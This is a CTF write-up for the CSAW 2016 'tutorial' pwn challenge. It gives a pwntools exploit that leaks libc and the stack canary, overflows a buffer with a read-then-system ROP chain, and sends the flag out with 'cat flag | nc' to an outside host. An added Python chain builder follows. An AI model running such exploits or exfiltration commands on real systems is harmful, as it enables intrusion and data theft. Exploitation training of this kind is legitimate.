cdor1's lab
CSAW 2016 tutorial
Leak the canary, work out the gadget offsets from the provided libc, turn them into absolute gadget addresses once the libc base is known, and then do 64-bit ROP.

func@plt - rdi, rsi, rdx, rcx

On x86-64 (SysV ABI) the first integer arguments travel in rdi, rsi, rdx, rcx (then r8, r9), not on the stack as in 32-bit. Just remember that order: put each argument in place with a pop rdi; ret, pop rsi; ret, ... gadget, then return into the function.
```python
from pwn import *

s = remote('localhost', 4000)
elf = ELF('./tutorial')

# Offsets of 'pop rdi; ret', 'pop rsi; ret' and 'pop rdx; ret' in the
# provided libc, typed in at run time (e.g. copied from ROPgadget output);
# accepts 0x-prefixed hex or decimal.
offset_rdi = int(input('pop rdi; ret offset: '), 0)
offset_rsi = int(input('pop rsi; ret offset: '), 0)
offset_rdx = int(input('pop rdx; ret offset: '), 0)
base_offset = 0x6f860  # distance from the leaked pointer to the libc base

# 1) Menu 1 prints a libc pointer ("Reference:0x..."): use it to find the base.
print(s.recvuntil(b'>'))
s.sendline(b'1')
print(s.recvuntil(b'Reference:0x'))
leak = int(s.recvline().strip(), 16)
base = leak - base_offset
system = base + 0x46640  # system() offset in the provided libc
prdi = base + offset_rdi
prsi = base + offset_rsi
prdx = base + offset_rdx
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
log.info('system : ' + hex(system))

# 2) Menu 2 echoes the buffer back. The buffer is 312 bytes: 311 'a' plus the
#    newline that sendline appends fill it exactly, so the 8 bytes echoed right
#    after the newline are the stack canary (its low byte is 0x00).
print(s.recvuntil(b'>'))
s.sendline(b'2')
print(s.recvuntil(b'>'))
s.sendline(b'a' * 311)
print(s.recvuntil(b'a' * 311 + b'\n'))
canary = u64(s.recv(8))
log.info('canary : ' + hex(canary))

# 3) Menu 2 again, this time overflowing: buffer, the leaked canary, saved rbp,
#    then the ROP chain. Arguments go in rdi, rsi, rdx in that order.
print(s.recvuntil(b'>'))
s.sendline(b'2')
print(s.recvuntil(b'>'))
payload = b'A' * 312
payload += p64(canary)           # keep the stack protector check passing
payload += b'A' * 8              # saved rbp, value does not matter
payload += p64(prdi) + p64(4)    # rdi = 4, the fd this connection is served on
payload += p64(prsi) + p64(elf.bss())
payload += p64(prdx) + p64(100)
payload += p64(elf.plt['read'])  # read(4, bss, 100): pulls the command below into .bss
payload += p64(prdi) + p64(elf.bss())
payload += p64(system)           # system(bss)
s.sendline(payload)
# The command is consumed by the read() above; its output is shipped to a
# listener with nc rather than read back on this socket.
s.sendline(b'cat flag | nc cdor1.cf 8080')
s.interactive()
```
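To make the argument-order rule and the payload layout above concrete without a live target, here is an added example (not code from the original post): a small pure-Python chain builder that, for each argument, emits the matching pop reg; ret gadget followed by the value in the rdi, rsi, rdx, rcx order and then returns into the function, plus the canary extraction from the echoed buffer that the script relies on. All addresses (LIBC_BASE, the gadget offsets, READ_PLT, BSS) are constructed for the demo and are not taken from the challenge binary or libc; only the 312-byte buffer size and the system offset 0x46640 come from the script above.

```python
import struct

# x86-64 SysV integer argument registers, in order. A ROP "call" is: pop each
# needed register in this order, then return into the function.
ARG_REGS = ("rdi", "rsi", "rdx", "rcx")


def p64(v):
    """Pack a 64-bit little-endian value (pwntools p64 equivalent)."""
    return struct.pack("<Q", v & 0xFFFFFFFFFFFFFFFF)


def u64(b):
    """Unpack 8 little-endian bytes (pwntools u64 equivalent)."""
    return struct.unpack("<Q", b)[0]


def rop_call(gadgets, func, *args):
    """Return the chain for func(*args) using 'pop reg; ret' gadgets.

    gadgets maps register name -> absolute address of 'pop <reg>; ret'.
    Only register arguments are supported (up to 4 here); the chain is
    [pop rdi][arg0][pop rsi][arg1]...[func], so func's 'ret' continues
    with whatever follows this chain on the stack.
    """
    if len(args) > len(ARG_REGS):
        raise ValueError("at most %d register arguments" % len(ARG_REGS))
    chain = b""
    for reg, val in zip(ARG_REGS, args):
        if reg not in gadgets:
            raise KeyError("need a 'pop %s; ret' gadget" % reg)
        chain += p64(gadgets[reg]) + p64(val)
    chain += p64(func)
    return chain


def build_payload(buf_size, canary, calls):
    """Stack layout used by the exploit: buffer, canary, saved rbp, ROP chain."""
    payload = b"A" * buf_size
    payload += p64(canary)   # leaked value, so __stack_chk_fail is never reached
    payload += b"B" * 8      # saved rbp; any value works
    for chain in calls:
        payload += chain
    return payload


def extract_canary(echo, buf_size, fill=b"a"):
    """Recover the canary from an echoed buffer.

    The leak sends buf_size-1 fill bytes; sendline's newline becomes the last
    buffer byte, so the 8 bytes after the newline are the canary. A real
    canary always has 0x00 as its low byte, which is a cheap sanity check.
    """
    marker = fill * (buf_size - 1) + b"\n"
    idx = echo.find(marker)
    if idx < 0:
        raise ValueError("echoed buffer not found")
    start = idx + len(marker)
    if len(echo) < start + 8:
        raise ValueError("echo too short to contain the canary")
    canary = u64(echo[start:start + 8])
    if canary & 0xFF != 0:
        raise ValueError("low byte is not zero: probably not the canary")
    return canary


# Constructed demo values (hypothetical, not from the challenge binary/libc).
LIBC_BASE = 0x7FFFF7A00000
GADGETS = {
    "rdi": LIBC_BASE + 0x21102,   # hypothetical 'pop rdi; ret' offset
    "rsi": LIBC_BASE + 0x202E8,   # hypothetical 'pop rsi; ret' offset
    "rdx": LIBC_BASE + 0x1B92,    # hypothetical 'pop rdx; ret' offset
}
SYSTEM = LIBC_BASE + 0x46640      # system() offset used by the script above
READ_PLT = 0x400700               # hypothetical read@plt
BSS = 0x602010                    # hypothetical .bss address
BUF_SIZE = 312                    # buffer size used by the script above


def example_payload(canary):
    """read(4, BSS, 100) then system(BSS): the same chain the script builds."""
    read_cmd = rop_call(GADGETS, READ_PLT, 4, BSS, 100)
    run_cmd = rop_call(GADGETS, SYSTEM, BSS)
    return build_payload(BUF_SIZE, canary, [read_cmd, run_cmd])


if __name__ == "__main__":
    # Constructed echo: 311 'a', the newline, the canary, then 4 trailing bytes.
    echo = b"a" * 311 + b"\n" + p64(0x00DEADBEEFCAFE00) + b"\x01\x02\x03\x04"
    canary = extract_canary(echo, BUF_SIZE)
    print("canary:", hex(canary))
    print("payload length:", len(example_payload(canary)))
```

The builder deliberately refuses a fifth argument: r8/r9 gadgets are rarer, and a practitioner should notice when a call needs them rather than silently get a truncated chain.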